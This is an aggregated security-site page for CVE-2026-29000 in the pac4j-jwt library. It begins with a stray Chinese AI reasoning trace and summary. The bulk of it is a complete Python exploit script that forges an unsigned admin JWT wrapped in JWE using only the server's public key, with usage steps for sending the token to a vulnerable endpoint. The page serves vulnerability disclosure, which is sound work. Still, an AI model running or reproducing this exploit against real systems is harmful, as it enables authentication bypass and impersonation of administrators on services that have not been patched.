好的,我现在需要帮助用户总结一篇技术文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的内容,理解其中的关键点。 这篇文章主要讨论的是pac4j-jwt库中的一个安全漏洞,CVE-2026-29000。漏洞影响的是特定版本的pac4j-jwt库,包括4.5.9、5.7.9和6.3.3之前的版本。攻击者可以利用这个漏洞绕过身份验证,具体方法是通过JWE包装一个未签名的PlainJWT来伪造认证令牌。 文章中提到攻击者只需要服务器的RSA公钥就可以生成恶意的JWE令牌。这个令牌被提交到受保护的端点时,由于签名验证被绕过,攻击者可以冒充任何用户,包括管理员。这种攻击方式属于远程认证绕过,CVSS评分为10.0,属于严重级别。 此外,文章还提供了一个Python脚本作为概念验证(PoC),展示了如何生成恶意令牌。修复版本已经发布,建议用户升级到4.5.9、5.7.9或6.3.3及更高版本以解决这个问题。 总结时,我需要涵盖漏洞的影响范围、攻击方式、后果以及修复建议。同时要保持简洁,在100字以内。 </think> pac4j-jwt库存在身份验证绕过漏洞(CVE-2026-29000),允许攻击者利用服务器RSA公钥伪造JWE包裹的PlainJWT令牌,绕过签名验证并冒充用户(包括管理员)。该漏洞影响版本<4.5.9、<5.7.9和<6.3.3。已修复于4.5.9、5.7.9和6.3.3+版本。 2026-3-8 15:38:36 Author: cxsecurity.com(查看原文) 阅读量:9 收藏
pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT
#!/usr/bin/env python3 # Exploit Title: pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT # CVE: CVE-2026-29000 # Date: 2026-03-05 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.pac4j.org # Software Link: https://github.com/pac4j/pac4j # Affected: pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 # Tested on: Python 3.12 with pyjwt + cryptography # Category: Remote Authentication Bypass # Platform: Java (pac4j-jwt library) # Exploit Type: Proof of Concept # CVSS: 10.0 (Critical) # CWE : CWE-347 (Improper Verification of Cryptographic Signature) # Description: Allows remote attackers with only the server's RSA public key to forge authentication tokens by wrapping an unsigned PlainJWT in JWE (RSA-OAEP-256 + A256GCM), bypassing signature verification and impersonating any user (including admins). # Fixed in: pac4j-jwt 4.5.9, 5.7.9, 6.3.3+ # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # (No command-line args needed in this standalone PoC version) # # Notes: # - Requires: pip install pyjwt cryptography # - This generates a malicious token locally; in a real attack you'd fetch the public key from the target's JWKS endpoint. # - For demo only — use responsibly and only on systems you own or have explicit permission to test. # # How to Use # # Step 1: Run the script to generate a malicious JWE token # Step 2: Submit the token in an Authorization: Bearer <token> header to a vulnerable pac4j-jwt protected endpoint print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-29000 • pac4j-jwt → Auth Bypass via Public Key ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import json from datetime import datetime, timedelta, timezone from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives.asymmetric.padding import OAEP from cryptography.hazmat.primitives.hashes import SHA256 from cryptography.hazmat.backends import default_backend import jwt private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) public_key = private_key.public_key() public_pem = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ).decode('utf-8') print("[+] Public key (PEM) that attacker would use:\n") print(public_pem) malicious_claims = { "sub": "admin#override", "email": "[email protected]", "$int_roles": ["ROLE_ADMIN", "ROLE_SUPERUSER"], "iat": int(datetime.now(timezone.utc).timestamp()), "exp": int((datetime.now(timezone.utc) + timedelta(hours=1)).timestamp()) } print("\n[+] Malicious claims:") print(json.dumps(malicious_claims, indent=2)) header = { "alg": "none", "typ": "JWT" } payload = jwt.utils.base64url_encode(json.dumps(malicious_claims).encode()).decode() unsigned_jwt = ( jwt.utils.base64url_encode(json.dumps(header).encode()).decode() + "." + payload + "." ) print("\n[+] Unsigned PlainJWT (inner token):\n" + unsigned_jwt) jwe_header = { "alg": "RSA-OAEP-256", "enc": "A256GCM", "typ": "JWE", "cty": "JWT" } protected = jwt.utils.base64url_encode(json.dumps(jwe_header).encode()).decode() cek = jwt.utils.generate_key(32) encrypted_key = public_key.encrypt( cek, OAEP( mgf=OAEP.MGF1(algorithm=SHA256()), algorithm=SHA256(), label=None ) ) encrypted_key_b64 = jwt.utils.base64url_encode(encrypted_key).decode() iv = jwt.utils.generate_key(12) ciphertext, tag = jwt.algorithms.AESGCM(cek).encrypt( nonce=iv, data=unsigned_jwt.encode(), associated_data=protected.encode() ) iv_b64 = jwt.utils.base64url_encode(iv).decode() ciphertext_b64 = jwt.utils.base64url_encode(ciphertext).decode() tag_b64 = jwt.utils.base64url_encode(tag).decode() jwe_token = ( protected + "." + encrypted_key_b64 + "." + iv_b64 + "." + ciphertext_b64 + "." + tag_b64 ) print("\n[+] Malicious JWE token (submit this to vulnerable pac4j-jwt):\n") print(jwe_token) print("\n(length: {} chars)".format(len(jwe_token)))
References:
https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html
https://www.vulncheck.com/advisories/pac4j-jwt-jwtauthenticator-authentication-bypass
https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key
https://nvd.nist.gov/vuln/detail/CVE-2026-29000
(once published)
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh